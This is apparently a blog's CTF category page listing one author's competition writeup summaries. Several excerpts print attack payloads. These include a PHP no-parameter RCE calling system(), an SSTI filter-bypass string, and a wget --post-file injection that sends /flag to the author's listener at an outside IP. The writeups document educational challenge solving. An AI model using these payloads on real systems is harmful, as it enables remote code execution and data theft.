![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
CTF
文章平均质量分 83
Le1a
这个作者很懒,什么都没留下…
展开
-
MTCTF Writeup By Light1ng
下载附件,是一个flask框架,然后很明显的存在pickle反序列化,首先我们需要伪造session成为admin。爆破得到key为6284,现在就可以通过来伪造session。目前就成功伪造了session。接下来看看后面的反序列化逻辑。从session中获取ser_data键的值,然后替换掉一些字符,然后过滤R i o b,就没法用pker来生成payload了,这里直接手搓opcode了,然后现在只需要把这个base64编码一下,然后作为ser_data的值,写入session即可。原创 2022-10-21 15:55:18 · 785 阅读 · 0 评论 -
长安“战疫“网络安全赛Writeup
WebRCE_No_Para无参RCE?1=system('tac flag.php');&code=eval(current(current(get_defined_vars())));flaskadmin?static.js?然后发现传参点:?name=简单试了下SSTI,发现过滤了引号等符号考虑attr结合16进制来绕过{{a|attr(%27\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f%27)|attr(%27\x5f\x5f\x62\x6原创 2022-01-12 21:53:11 · 3821 阅读 · 0 评论 -
2021年第四届“安洵杯”网络安全挑战赛Writeup
Misc应该算是签到B站搜索直接搜索这个BV号PS:出题人品味不错,我也喜欢酷玩的这首《Yellow》直接页面Ctrl+F没找出来搜索引擎找一下有没有通过API查弹幕的方法:https://www.bilibili.com/read/cv7923601F12点击Network,找到这个视频的cid从当前时间2021-11-27开始往前找https://api.bilibili.com/x/v2/dm/web/history/seg.so?type=1&oid=40043856原创 2021-11-28 14:48:20 · 8224 阅读 · 5 评论 -
[红明谷CTF 2021]write_shell
2021[ 红明谷CTF] write_shell[红明谷CTF 2021]write_shell进入题目,就给了源码,审计一下<?phperror_reporting(0);highlight_file(__FILE__);function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$inpu原创 2021-11-22 19:23:30 · 5837 阅读 · 0 评论 -
2021“西湖论剑“网络安全大赛Writeup
2021"西湖论剑"网络安全大赛Writeup我只写了自己做的部分,完整WP请访问下载:https://wwe.lanzoui.com/i2XlFwqd4gb密码:Le1aWeb详见fmyyy师傅:https://blog.csdn.net/fmyyy1/article/details/121451279?spm=1001.2014.3001.5501Misc真·签到扫码关注公众号,发送语音即可flag:DASCTF{welc0m3_t0_9C51s_2021}YUSA的小秘密原创 2021-11-21 13:46:30 · 9296 阅读 · 1 评论 -
2021年“深育杯“网络安全大赛Writeup
Misc签到题下载附件得到一张二维码扫码关注,后台回复签到即可获得flagflag:SangFor{AaKjtQr_OjJpdA3QwBV_ndsKdn3vPgc_}Login下载附件example.zip,打开是password.zip但是需要密码,尝试爆破此时发现了异常,打开明明只有一个password.zip文件,这里却检测到了两个加密文件,于是我们将压缩包用010 Editor打开分析一下发现有伪加密,将此处以及后面一处的09改为00,保存之后再打开压缩包发现多了两个原创 2021-11-15 08:48:15 · 1457 阅读 · 3 评论 -
陇原战“疫“2021网络安全大赛Writeup
WebCheckIN源代码的这两处:先尝试访问/wget:/wget?argv=a,看出来这里应该是可以进行攻击的了接着尝试利用wget的--post-file进行数据外带,读取源代码在自己VPS开个监听并且构造:/wget?argv=a&argv=--post-file&argv=/flag&argv=http://1.14.92.24:8008/拿到flag:flag{6e6f4abf-f38c-4d30-8ccd-e0bc0012a13f}Misc原创 2021-11-08 14:35:24 · 6113 阅读 · 6 评论 -
2021年全国大学生网络安全邀请赛暨第七届“东华杯“上海市大学生网络安全大赛Writeup
2021年全国大学生网络安全邀请赛暨第七届"东华杯"上海市大学网格全大赛WriteupMisccheckin题目给了+AGYAbABhAGcAewBkAGgAYgBfADcAdABoAH0- 是UTF-7编码,解码得到flagflag为:flag{dhb_7th}project下载附件,解压之后发现这是道工控题目,但是解压之后里面有一个压缩包problem_bak.zip解压得到你来了~这里面一共有三段数据,第一段是base64编码6KGo5oOF5YyF5paH5YyW77y原创 2021-11-01 08:33:09 · 9333 阅读 · 7 评论 -
2021年“绿盟杯”重庆市大学生信息安全竞赛—Light1ng战队Writeup
2021年“绿盟杯”重庆市大学生信息安全竞赛—Light1ng战队Writeup其余方向Writeup详见pdf:https://wws.lanzoui.com/iWk1ovo0eaj密码:Le1aMiscMisc1:签到1题目给了一串base64编码解码得到flag:flag{c54ce9d7b4e17980dd4906d9941ed52a}Misc2:DECODER下载附件,打开得到3个txt,应该对应着三个部分的flagflag_1.txt: 042f38b694base原创 2021-10-23 16:22:10 · 2668 阅读 · 2 评论 -
2021年绿城杯Light1ng战队Writeup
Light1ng战队一、战队信息名称:Light1ng排名:16二、解题情况进不去平台了,没法截图了三、解题过程Web1.ezphpezphp在关于里看到个Git,所以考虑存在git泄露index.php里的php代码<?phpif (isset($_GET['link_page'])) { $link_page = $_GET['link_page'];} else { $link_page = "home";}$page_file = "pages/"原创 2021-09-30 09:20:57 · 3160 阅读 · 0 评论 -
DASCTF Sept X 浙江工业大学秋季挑战赛 Misc Girlfriend‘s account
Girlfriend’s account下载附件,得到一个excel表格,打开得到flag{账单总金额四舍五入保留至小数点后两位},例如总金额为 543.21 元时,你需要提交 flag{543.21}也就是说这个excel是个账单,不仅有商品单价,还有购买商品的数量,flag就是计算账单的总额,也就是算他女朋友花了多少钱,然后保留两位小数。excel有函数可以计算乘法跟求和,但是这里并不是阿拉伯数字,所以我们接下来要做的就是把这个人民币的中文大写数字给转为阿拉伯数字 。百度上查阅一下百度知道链原创 2021-09-26 20:14:28 · 293 阅读 · 2 评论 -
0CTF/TCTF 2021 Quals_Misc_singer
Miscsinger下载附件打开得到一个文本文件从Csome-Official师傅的文章中得知,其文本内容除了=和,外,其他的是简谱音名没写完 明天写原创 2021-07-07 00:33:20 · 349 阅读 · 0 评论 -
GKCTF2021 ✖ DASCTF应急挑战杯 部分WP
Misc你知道apng吗下载附件得到girl.apng,用apngdis_gui分解得到每一帧的png图片分别在2,18,26发现二维码。其中18,26可以直接扫描得到-ad20和-0327-288a235370ea}。图片2是扭曲的二维码,但可以用ps拖正扫描得到flag{a3c7e4e5,最后在第十张图片的红色通道1中得到二维码扫描得到-9b9d,所以flag为 flag{a3c7e4e5-9b9d-ad20-0327-288a235370ea}银杏岛の奇妙冒险下载附件,打开exe,原创 2021-06-27 14:05:27 · 993 阅读 · 0 评论